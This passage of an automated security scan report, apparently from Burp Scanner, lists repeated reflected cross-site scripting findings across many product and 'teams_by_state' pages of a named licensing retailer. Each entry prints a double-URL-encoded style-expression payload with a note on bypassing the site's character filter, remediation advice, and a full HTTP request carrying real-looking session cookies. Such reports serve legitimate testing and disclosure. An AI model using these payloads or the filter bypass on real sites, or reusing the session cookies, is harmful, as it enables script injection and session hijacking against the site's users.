The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6de83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275840fdf7ac4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6de83'style='x:expression(alert(1))'5840fdf7ac4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /desk_calendars?6de83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275840fdf7ac4=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.177. http://www.turnerlicensing.com/home [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/home
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b6ece%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270391ff654b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6ece'style='x:expression(alert(1))'0391ff654b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /home?b6ece%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270391ff654b2=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.178. http://www.turnerlicensing.com/magnetic_to-do_notes [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/magnetic_to-do_notes
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea298%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273a5ce7edc7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea298'style='x:expression(alert(1))'3a5ce7edc7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /magnetic_to-do_notes?ea298%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273a5ce7edc7c=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.179. http://www.turnerlicensing.com/memo_books [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/memo_books
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 70115%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e817eec67bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70115'style='x:expression(alert(1))'e817eec67bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /memo_books?70115%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e817eec67bd=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.180. http://www.turnerlicensing.com/nondated_combo_packs [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/nondated_combo_packs
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1120%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278f5f8e675c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1120'style='x:expression(alert(1))'8f5f8e675c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /nondated_combo_packs?d1120%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278f5f8e675c5=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.181. http://www.turnerlicensing.com/paper_and_desk_caddy [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/paper_and_desk_caddy
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 524ea%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252708e0d4230be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 524ea'style='x:expression(alert(1))'08e0d4230be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /paper_and_desk_caddy?524ea%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252708e0d4230be=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.182. http://www.turnerlicensing.com/paper_cubes [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/paper_cubes
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b6f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757f8f7591a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b6f7'style='x:expression(alert(1))'57f8f7591a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /paper_cubes?1b6f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757f8f7591a8=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.183. http://www.turnerlicensing.com/portfolios [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/portfolios
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f0f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b5a9e77cfd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f0f7'style='x:expression(alert(1))'b5a9e77cfd5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /portfolios?2f0f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b5a9e77cfd5=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.184. http://www.turnerlicensing.com/teams_by_state/Alabama [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Alabama
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bd71c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b08045fc3e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd71c'style='x:expression(alert(1))'b08045fc3e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Alabama?bd71c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b08045fc3e2=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.185. http://www.turnerlicensing.com/teams_by_state/Alaska [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Alaska
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4d41a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275bce84a02ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d41a'style='x:expression(alert(1))'5bce84a02ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Alaska?4d41a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275bce84a02ce=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.186. http://www.turnerlicensing.com/teams_by_state/Arizona [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Arizona
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a0e30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d86d71a4401 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0e30'style='x:expression(alert(1))'d86d71a4401 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Arizona?a0e30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d86d71a4401=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.187. http://www.turnerlicensing.com/teams_by_state/Arkansas [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Arkansas
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1396a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276e71f63c249 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1396a'style='x:expression(alert(1))'6e71f63c249 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Arkansas?1396a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276e71f63c249=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.188. http://www.turnerlicensing.com/teams_by_state/Calgary [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Calgary
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7cdd3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d075c1b2de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7cdd3'style='x:expression(alert(1))'8d075c1b2de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Calgary?7cdd3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d075c1b2de=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.189. http://www.turnerlicensing.com/teams_by_state/California [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/California
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e8313%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773dad229e98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8313'style='x:expression(alert(1))'73dad229e98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/California?e8313%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773dad229e98=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.190. http://www.turnerlicensing.com/teams_by_state/Colorado [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Colorado
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 43f2c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252725987bedbdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43f2c'style='x:expression(alert(1))'25987bedbdc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Colorado?43f2c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252725987bedbdc=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.191. http://www.turnerlicensing.com/teams_by_state/Connecticut [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Connecticut
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b72d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527146d7de1dc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b72d'style='x:expression(alert(1))'146d7de1dc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
